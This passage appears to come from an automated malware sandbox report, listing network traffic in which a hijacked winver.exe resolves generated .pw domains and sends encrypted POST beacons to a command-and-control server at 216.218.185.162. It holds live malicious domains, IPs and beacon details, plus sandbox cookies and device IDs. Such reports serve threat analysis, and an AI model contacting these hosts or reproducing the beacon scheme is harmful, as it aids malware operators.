                                                                                                                                                              Jan 20, 2024 20:41:56.085191011 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:56.140013933 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:02.088078022 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:02.140111923 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:08.086219072 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:08.140036106 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:14.087224960 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:14.140031099 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:20.087171078 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:20.140094042 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:26.083926916 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:26.124407053 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:32.096539021 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:32.140062094 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:38.086131096 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:38.140057087 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:44.084769011 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:44.140048027 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:50.084806919 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:50.140110970 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:42:56.083399057 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:42:56.124511957 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:02.089776039 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:02.140157938 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:08.087153912 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:08.140094042 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:14.085644007 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:14.140183926 CET4974380192.168.2.4216.218.185.162
                                                                                                                                                              Jan 20, 2024 20:43:20.091068029 CET8049743216.218.185.162192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:43:20.140271902 CET4974380192.168.2.4216.218.185.162

                                                                                                                                                              UDP Packets

                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Jan 20, 2024 20:41:01.005306005 CET5862653192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:01.758816957 CET53586261.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:34.197884083 CET6304153192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:34.638372898 CET53630411.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:39.848987103 CET5385653192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:40.408725023 CET53538561.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:41.249921083 CET6004553192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:41.820075989 CET53600451.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:42.670917988 CET5865153192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:43.146290064 CET53586511.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:44.152683973 CET5529253192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:44.901298046 CET53552921.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:45.842540026 CET5561453192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:46.378681898 CET53556141.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:47.217844963 CET5184153192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:47.777020931 CET53518411.1.1.1192.168.2.4
                                                                                                                                                              Jan 20, 2024 20:41:48.605392933 CET5143853192.168.2.41.1.1.1
                                                                                                                                                              Jan 20, 2024 20:41:49.305752993 CET53514381.1.1.1192.168.2.4

                                                                                                                                                              DNS Queries

                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Jan 20, 2024 20:41:01.005306005 CET192.168.2.41.1.1.10xa92Standard query (0)spaines.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:34.197884083 CET192.168.2.41.1.1.10x58c1Standard query (0)uyhgqunqkxnx.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:39.848987103 CET192.168.2.41.1.1.10x7d30Standard query (0)vcklmnnejwxx.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:41.249921083 CET192.168.2.41.1.1.10x801dStandard query (0)cmnsgscccrej.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:42.670917988 CET192.168.2.41.1.1.10xc6ceStandard query (0)evbsdqvgmpph.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:44.152683973 CET192.168.2.41.1.1.10x68ecStandard query (0)mfueeimvyrsp.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:45.842540026 CET192.168.2.41.1.1.10x6d61Standard query (0)utmyhnffxpcj.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:47.217844963 CET192.168.2.41.1.1.10x8f77Standard query (0)fkmmvfeonnyh.pwA (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:48.605392933 CET192.168.2.41.1.1.10xea19Standard query (0)gfnlmtcolrrb.pwA (IP address)IN (0x0001)false

                                                                                                                                                              DNS Answers

                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Jan 20, 2024 20:41:01.758816957 CET1.1.1.1192.168.2.40xa92No error (0)spaines.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:34.638372898 CET1.1.1.1192.168.2.40x58c1No error (0)uyhgqunqkxnx.pw178.62.201.34A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:34.638372898 CET1.1.1.1192.168.2.40x58c1No error (0)uyhgqunqkxnx.pw45.77.249.79A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:34.638372898 CET1.1.1.1192.168.2.40x58c1No error (0)uyhgqunqkxnx.pw104.131.68.180A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:40.408725023 CET1.1.1.1192.168.2.40x7d30No error (0)vcklmnnejwxx.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:41.820075989 CET1.1.1.1192.168.2.40x801dNo error (0)cmnsgscccrej.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:43.146290064 CET1.1.1.1192.168.2.40xc6ceNo error (0)evbsdqvgmpph.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:44.901298046 CET1.1.1.1192.168.2.40x68ecNo error (0)mfueeimvyrsp.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:46.378681898 CET1.1.1.1192.168.2.40x6d61No error (0)utmyhnffxpcj.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:47.777020931 CET1.1.1.1192.168.2.40x8f77No error (0)fkmmvfeonnyh.pw216.218.185.162A (IP address)IN (0x0001)false
                                                                                                                                                              Jan 20, 2024 20:41:49.305752993 CET1.1.1.1192.168.2.40xea19No error (0)gfnlmtcolrrb.pw216.218.185.162A (IP address)IN (0x0001)false

                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                              • https:
                                                                                                                                                                • www.bing.com
                                                                                                                                                              • spaines.pw
                                                                                                                                                              • uyhgqunqkxnx.pw
                                                                                                                                                              • vcklmnnejwxx.pw
                                                                                                                                                              • cmnsgscccrej.pw
                                                                                                                                                              • evbsdqvgmpph.pw
                                                                                                                                                              • mfueeimvyrsp.pw
                                                                                                                                                              • utmyhnffxpcj.pw
                                                                                                                                                              • fkmmvfeonnyh.pw
                                                                                                                                                              • gfnlmtcolrrb.pw

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.449735216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:33.804089069 CET93OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: spaines.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: 71 72 15 f5 52 7a 15 f5 1a ea 4f 98 77 70 14 d6 41 42 25 c5 41 42 25 c5
                                                                                                                                                              Data Ascii: qrRzOwpAB%AB%
                                                                                                                                                              Jan 20, 2024 20:41:33.960119963 CET133OUTData Raw: 00 80 00 00 00 77 ee f1 1d 7b 26 be ec 1a 51 ba f1 d2 a4 d3 f7 e9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 51 1f 7d 8b b1 fa 20 7f d5 68 20 b9 64 2d 3f 5d 75 5b 59 96 08 6f c1 78 ed b9 d0 35 6a c9 d1 e5 40 d4 82 f1 9f ac 7f af df 22 ef b5 be
                                                                                                                                                              Data Ascii: w{&QYg6u#aQ} h d-?]u[Yox5j@"E{=sg(WEa)Vr:*9P/s;w\I}E cL
                                                                                                                                                              Jan 20, 2024 20:41:34.114938974 CET156INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:34 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.2.449736178.62.201.34807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:39.347423077 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: uyhgqunqkxnx.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: 17 36 54 98 31 3e 54 98 7c ae 0e f5 11 34 55 bb 27 06 64 a8 27 06 64 a8
                                                                                                                                                              Data Ascii: 6T1>T|4U'd'd
                                                                                                                                                              Jan 20, 2024 20:41:39.548875093 CET133OUTData Raw: 00 80 00 00 00 71 e7 f8 13 64 36 a3 b3 01 5e d4 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 39 4a f8 f8 69 9c bb 58 67 95 f1 e5 10 ce c9 7a 29 76 e2 6c 49 27 bf 3d ce 18 35 7b 8e 77 8d a5 69 52 2e d0 b6 8b 3f fb 10 5a d0 0a ff
                                                                                                                                                              Data Ascii: qd6^Yg6u#a9JiXgz)vlI'=5{wiR.?Z[SUEn&uaKb*)&;Q[NYG<:M@!=7
                                                                                                                                                              Jan 20, 2024 20:41:39.847723007 CET75INHTTP/1.0 200 OK
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:39 GMT
                                                                                                                                                              Content-Length: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              2192.168.2.449737216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:40.938841105 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: vcklmnnejwxx.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: 46 b7 57 5a 61 bf 57 5a 2d 2f 0d 37 40 b5 56 79 76 87 67 6a 76 87 67 6a
                                                                                                                                                              Data Ascii: FWZaWZ-/7@Vyvgjvgj
                                                                                                                                                              Jan 20, 2024 20:41:41.093404055 CET133OUTData Raw: 00 80 00 00 00 72 fd fb 18 78 2d a3 a7 00 51 c2 89 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 09 ac 5d 2b cd 11 51 be 0d 21 32 ce 0e 27 ca 14 6b 83 32 28 44 94 35 9a 02 1e 4f d9 63 c0 ff 27 57 aa 03 30 79 fe 7f 27 3b 5c 8d 3e 64
                                                                                                                                                              Data Ascii: rx-QYg6u#a]+Q!2'k2(D5Oc'W0y';\>d!RI~=nq>)BZR?P9%Iu/
                                                                                                                                                              Jan 20, 2024 20:41:41.248694897 CET156INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:41 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              3192.168.2.449738216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:42.359144926 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: cmnsgscccrej.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: 8a 6a 6e 07 a2 62 6e 07 e1 f2 34 6a 8c 68 6f 24 ba 5a 5e 37 ba 5a 5e 37
                                                                                                                                                              Data Ascii: jnbn4jho$Z^7Z^7
                                                                                                                                                              Jan 20, 2024 20:41:42.514324903 CET133OUTData Raw: 00 80 00 00 00 67 f3 fe 07 72 30 ae a1 09 54 df 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 9a 7e 0d f6 e5 fb 81 6b d7 15 c2 1b 43 11 fa f9 de 31 42 c5 50 0a 65 6f 0f 64 9f 2d c3 b7 0f db 5a 3a 33 cf 96 4f 2f dc c6 77 d2 c9 a0
                                                                                                                                                              Data Ascii: gr0TYg6u#a~kC1BPeod-Z:3O/w^U^EC(>U~~V&b9
                                                                                                                                                              Jan 20, 2024 20:41:42.669940948 CET156INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:42 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              4192.168.2.449739216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:43.842658997 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: evbsdqvgmpph.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: c9 d0 3a ba e1 d8 3a ba a2 48 60 d7 cf d2 3b 99 f9 e0 0a 8a f9 e0 0a 8a
                                                                                                                                                              Data Ascii: ::H`;
                                                                                                                                                              Jan 20, 2024 20:41:43.996901035 CET133OUTData Raw: 00 80 00 00 00 61 e8 f2 07 71 32 bb a5 07 56 ca 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 56 b8 bf 58 5f 57 7f c9 65 bf 6c bd 6c 15 a8 5b 60 b0 10 7b 6a 0c f9 cc c3 9a 73 8a d8 9c bb 78 4c b0 47 63 1f 31 bb 70 cf e8 46 6d 2b
                                                                                                                                                              Data Ascii: aq2VYg6u#aVX_Well[`{jsxLGc1pFm+n_a3@|lgzCbW?OA:Tq7!o
                                                                                                                                                              Jan 20, 2024 20:41:44.151778936 CET156INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:44 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              5192.168.2.449740216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:45.528111935 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: mfueeimvyrsp.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: 4a 7b a7 87 63 73 a7 87 21 e3 fd ea 4c 79 a6 a4 7a 4b 97 b7 7a 4b 97 b7
                                                                                                                                                              Data Ascii: J{cs!LyzKzK
                                                                                                                                                              Jan 20, 2024 20:41:45.682504892 CET133OUTData Raw: 00 80 00 00 00 69 f8 e5 11 70 2a a0 b4 13 54 c9 81 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 4f a2 b6 0d 48 0e 48 9c 14 0d 15 90 69 f2 a0 76 f3 80 08 4e ab 9c db f9 e2 b9 51 b7 45 1d ac 43 91 26 5e 54 53 52 b0 5b fe bf 7f 42 c8
                                                                                                                                                              Data Ascii: ip*TYg6u#aOHHivNQEC&^TSR[BE8+H5`b~P""2)Q8J|~#
                                                                                                                                                              Jan 20, 2024 20:41:45.837436914 CET156INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:45 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              6192.168.2.449741216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:46.905610085 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: utmyhnffxpcj.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: ce a6 09 2f e4 ae 09 2f a5 3e 53 42 c8 a4 08 0c fe 96 39 1f fe 96 39 1f
                                                                                                                                                              Data Ascii: //>SB99
                                                                                                                                                              Jan 20, 2024 20:41:47.060883045 CET133OUTData Raw: 00 80 00 00 00 71 ea fd 0d 7d 2d ab a4 12 56 d9 9b fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 83 f3 e3 c2 f9 8e 3a 57 b8 37 ab 24 53 8a 6d c2 4a 5b db f2 10 fb 8e 44 bf 58 26 02 e1 c1 60 f0 3d c2 aa 1b 2f 3a 84 08 5d 9c 2b 15 af
                                                                                                                                                              Data Ascii: q}-VYg6u#a:W7$SmJ[DX&`=/:]+m <D-WKuK`KxV:c%Gc5n,|@lU
                                                                                                                                                              Jan 20, 2024 20:41:47.216798067 CET156INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:47 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              7192.168.2.449742216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:48.295231104 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: fkmmvfeonnyh.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: fc 54 53 d8 d6 5c 53 d8 97 cc 09 b5 fa 56 52 fb cc 64 63 e8 cc 64 63 e8
                                                                                                                                                              Data Ascii: TS\SVRdcdc
                                                                                                                                                              Jan 20, 2024 20:41:48.449649096 CET133OUTData Raw: 00 80 00 00 00 62 f5 fd 19 63 25 a8 ad 04 48 c3 99 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 3a 58 ba ab 40 3e 74 3e 6c f2 11 4e 67 fc a7 94 81 0c 0d a8 ea 87 d7 1b 53 c2 6d 59 5a 21 d9 a7 8c 23 65 b0 fc 3f 5d a7 8c 25 60 be c7
                                                                                                                                                              Data Ascii: bc%HYg6u#a:X@>t>lNgSmYZ!#e?]%`p&GV_P,|R-u'-%[xU4
                                                                                                                                                              Jan 20, 2024 20:41:48.604362965 CET156INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:48 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              8192.168.2.449743216.218.185.162807396C:\Windows\SysWOW64\winver.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Jan 20, 2024 20:41:49.827227116 CET98OUTPOST /EiDQjNbWEQ/ HTTP/1.0
                                                                                                                                                              Host: gfnlmtcolrrb.pw
                                                                                                                                                              Content-Length: 157
                                                                                                                                                              Data Raw: b3 59 ba 92 98 51 ba 92 d8 c1 e0 ff b5 5b bb b1 83 69 8a a2 83 69 8a a2
                                                                                                                                                              Data Ascii: YQ[ii
                                                                                                                                                              Jan 20, 2024 20:41:49.982614040 CET133OUTData Raw: 00 80 00 00 00 63 f8 fe 18 78 37 ae ad 06 54 c8 93 fc d4 a4 f7 d9 59 16 eb 1f 03 67 36 75 23 1e 06 61 13 b5 1c 0e 68 13 65 d1 aa eb f4 85 50 f8 88 5a c4 1c 6e f7 eb 64 56 3a af 7f e0 59 ab f5 9e d8 25 31 6c ec e4 dd 7f 27 ba 35 6d fc ff f8 78 f0
                                                                                                                                                              Data Ascii: cx7TYg6u#ahePZndV:Y%1l'5mx8{s Iwx7V98I,mqKG
                                                                                                                                                              Jan 20, 2024 20:41:50.140456915 CET137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.21.6
                                                                                                                                                              Date: Sat, 20 Jan 2024 19:41:50 GMT
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Connection: close
                                                                                                                                                              Jan 20, 2024 20:41:50.140474081 CET1INData Raw: 51
                                                                                                                                                              Data Ascii: Q
                                                                                                                                                              Jan 20, 2024 20:41:56.085191011 CET1INData Raw: 74
                                                                                                                                                              Data Ascii: t
                                                                                                                                                              Jan 20, 2024 20:42:02.088078022 CET1INData Raw: 61
                                                                                                                                                              Data Ascii: a
                                                                                                                                                              Jan 20, 2024 20:42:08.086219072 CET1INData Raw: 4d
                                                                                                                                                              Data Ascii: M
                                                                                                                                                              Jan 20, 2024 20:42:14.087224960 CET1INData Raw: 57
                                                                                                                                                              Data Ascii: W
                                                                                                                                                              Jan 20, 2024 20:42:20.087171078 CET1INData Raw: 61
                                                                                                                                                              Data Ascii: a
                                                                                                                                                              Jan 20, 2024 20:42:26.083926916 CET1INData Raw: 4b
                                                                                                                                                              Data Ascii: K
                                                                                                                                                              Jan 20, 2024 20:42:32.096539021 CET1INData Raw: 64
                                                                                                                                                              Data Ascii: d
                                                                                                                                                              Jan 20, 2024 20:42:38.086131096 CET1INData Raw: 4f
                                                                                                                                                              Data Ascii: O


                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              0192.168.2.449730173.222.162.324434984C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-20 19:41:14 UTC2301OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                              Origin: https://www.bing.com
                                                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Language: en-CH
                                                                                                                                                              Content-type: text/xml
                                                                                                                                                              X-Agent-DeviceId: 01000A4109000CC6
                                                                                                                                                              X-BM-CBT: 1696420817
                                                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                              X-BM-DeviceScale: 100
                                                                                                                                                              X-BM-DTZ: 60
                                                                                                                                                              X-BM-Market: CH
                                                                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                                                              X-Device-ClientSession: 0912CF9094994CFA88DE52C6FB19D4E1
                                                                                                                                                              X-Device-isOptin: false
                                                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                              X-Device-OSSKU: 48
                                                                                                                                                              X-Device-Touch: false
                                                                                                                                                              X-DeviceID: 01000A4109000CC6
                                                                                                                                                              X-MSEdge-ExternalExp: bfbwsbrs0830tf,d-thshldspcl40,msbdsborgv2co,msbwdsbi920t1,spofglclicksh-c2,webtophit0r_t,wsbmsaqfuxtc,wsbqfasmsall_t,wsbqfminiserp400,wsbref-t
                                                                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                              X-PositionerType: Desktop
                                                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                                                              X-Search-TimeZone: Bias=0; DaylightBias=-60; TimeZoneKeyName=GMT Standard Time
                                                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                              Host: www.bing.com
                                                                                                                                                              Content-Length: 2237
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Cookie: MUID=6666694284484FA1B35CCB433D42E997; _SS=SID=193A581F83766B4319784BBF829B6A16&CPID=1696420820117&AC=1&CPH=e5c79613&CBV=39942242; _EDGE_S=SID=193A581F83766B4319784BBF829B6A16; SRCHUID=V=2&GUID=BA43D82178364AEA9C1EE6C32BE93416&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231003; SRCHHPGUSR=SRCHLANG=en&LUT=1696420817741&IPMH=425591ef&IPMID=1696420817913&HV=1696417346; ANON=A=6D8F9DF00282E660E425530EFFFFFFFF; CortanaAppUID=4C9C2B2D0465FD7A42C74C7E93CFB630; MUIDB=6666694284484FA1B35CCB433D42E997
                                                                                                                                                              2024-01-20 19:41:14 UTC2237OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 36 36 36 36 36 39 34 32 38 34 34 38 34 46 41 31 42 33 35 43 43 42 34 33 33 44 34 32 45 39 39 37 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 38 39 32 46 41 30 37 38 38 36 34 31 34 42 44 46 38 45 45 31 37 36 34 41 35 39 46 46 33 39 43 36 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43
